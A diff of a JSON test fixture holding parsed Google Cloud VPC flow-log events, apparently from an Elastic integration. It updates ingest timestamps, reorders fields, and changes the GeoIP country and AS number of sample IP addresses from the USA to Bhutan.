@@ -21556,7 +22579,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392368900Z", + "ingested": "2021-12-14T14:43:27.415285242Z", "original": "{\"insertId\":\"1gq7q7afe373f4\",\"jsonPayload\":{\"bytes_sent\":\"182861\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33536,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"245\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150282980Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150282980Z", @@ -21572,11 +22595,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -21654,7 +22682,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392374300Z", + "ingested": "2021-12-14T14:43:27.415285788Z", "original": "{\"insertId\":\"1gq7q7afe373eo\",\"jsonPayload\":{\"bytes_sent\":\"12145\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33570},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"94\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466779642Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466779642Z", 
@@ -21665,43 +22693,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65319, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 178669, - "packets": 634, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:uDbtB+K3v2jviOn2up59Tz92Rgk=", - "bytes": 178669, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 634, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -21712,6 +22703,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -21732,8 +22726,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65319, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 178669, + "packets": 634, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.392379900Z", + "ingested": "2021-12-14T14:43:27.415286197Z", "original": "{\"insertId\":\"1gq7q7afe373fb\",\"jsonPayload\":{\"bytes_sent\":\"178669\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65319,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"634\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.740597880Z", 
@@ -21741,6 +22760,18 @@ "id": "1gq7q7afe373fb", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:uDbtB+K3v2jviOn2up59Tz92Rgk=", + "bytes": 178669, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 634, + "direction": "outbound" } }, { @@ -21749,11 +22780,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -21831,7 +22867,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392386300Z", + "ingested": "2021-12-14T14:43:27.415286795Z", "original": "{\"insertId\":\"1gq7q7afe373fs\",\"jsonPayload\":{\"bytes_sent\":\"62066\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33540},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"359\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", @@ -21853,11 +22889,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33970, 
@@ -21929,7 +22970,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392389600Z", + "ingested": "2021-12-14T14:43:27.415287276Z", "original": "{\"insertId\":\"1gq7q7afe373ei\",\"jsonPayload\":{\"bytes_sent\":\"13440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33970},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"96\",\"reporter\":\"DEST\",\"rtt_msec\":\"308\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470006631Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470006631Z", @@ -21945,11 +22986,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33966, 
@@ -22027,7 +23073,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392394100Z", + "ingested": "2021-12-14T14:43:27.415287804Z", "original": "{\"insertId\":\"1gq7q7afe373ez\",\"jsonPayload\":{\"bytes_sent\":\"368131\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33966,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.800931420Z\",\"packets_sent\":\"76\",\"reporter\":\"SRC\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510698570Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510698570Z", @@ -22043,11 +23089,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -22125,7 +23176,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392399300Z", + "ingested": "2021-12-14T14:43:27.415288290Z", "original": "{\"insertId\":\"1gq7q7afe373fh\",\"jsonPayload\":{\"bytes_sent\":\"66258\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"365\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150282980Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150282980Z", 
@@ -22136,9 +23187,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:17.763Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 156 + } + } + }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -22147,13 +23228,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65276, 
@@ -22161,6 +23245,16 @@ "ip": "67.43.156.13", "packets": 749 }, + "event": { + "ingested": "2021-12-14T14:43:27.415288740Z", + "original": "{\"insertId\":\"1gq7q7afe373es\",\"jsonPayload\":{\"bytes_sent\":\"76976\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65276},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"749\",\"reporter\":\"DEST\",\"rtt_msec\":\"156\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760349279Z", + "end": "2019-06-14T03:49:56.220621567Z", + "id": "1gq7q7afe373es", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -22172,7 +23266,9 @@ "iana_number": "6", "packets": 749, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -22183,6 +23279,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -22199,25 +23298,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 156 + "ms": 62 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392404100Z", - "original": "{\"insertId\":\"1gq7q7afe373es\",\"jsonPayload\":{\"bytes_sent\":\"76976\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65276},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"749\",\"reporter\":\"DEST\",\"rtt_msec\":\"156\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760349279Z", - "end": "2019-06-14T03:49:56.220621567Z", - "id": "1gq7q7afe373es", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, 
@@ -22226,13 +23310,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65319, @@ -22240,6 +23327,16 @@ "ip": "67.43.156.13", "packets": 747 }, + "event": { + "ingested": "2021-12-14T14:43:27.415289144Z", + "original": "{\"insertId\":\"1gq7q7afe373fu\",\"jsonPayload\":{\"bytes_sent\":\"72967\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65319},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.740597880Z", + "end": "2019-06-14T03:49:56.220617595Z", + "id": "1gq7q7afe373fu", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -22251,7 +23348,9 @@ "iana_number": "6", "packets": 747, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -22259,9 +23358,12 @@ "related": { "ip": [ "67.43.156.13", - "10.139.99.242" + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -22278,25 +23380,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 62 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392408100Z", - "original": "{\"insertId\":\"1gq7q7afe373fu\",\"jsonPayload\":{\"bytes_sent\":\"72967\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65319},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.740597880Z", - "end": "2019-06-14T03:49:56.220617595Z", - "id": "1gq7q7afe373fu", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -22305,11 +23392,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 50364, 
@@ -22317,6 +23409,16 @@ "ip": "67.43.156.13", "packets": 9 }, + "event": { + "ingested": "2021-12-14T14:43:27.415289534Z", + "original": "{\"insertId\":\"1gq7q7afe373f2\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":50364},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"9\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:08.412738626Z", + "end": "2019-06-14T03:40:08.797851544Z", + "id": "1gq7q7afe373f2", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -22328,19 +23430,30 @@ "iana_number": "6", "packets": 9, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.87.40.76" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -22351,36 +23464,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392412600Z", - "original": "{\"insertId\":\"1gq7q7afe373f2\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":50364},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"9\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:08.412738626Z", - "end": "2019-06-14T03:40:08.797851544Z", - "id": "1gq7q7afe373f2", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 50364, 
@@ -22394,6 +23491,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415290090Z", + "original": "{\"insertId\":\"1gq7q7afe373ee\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":50364,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"8\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwo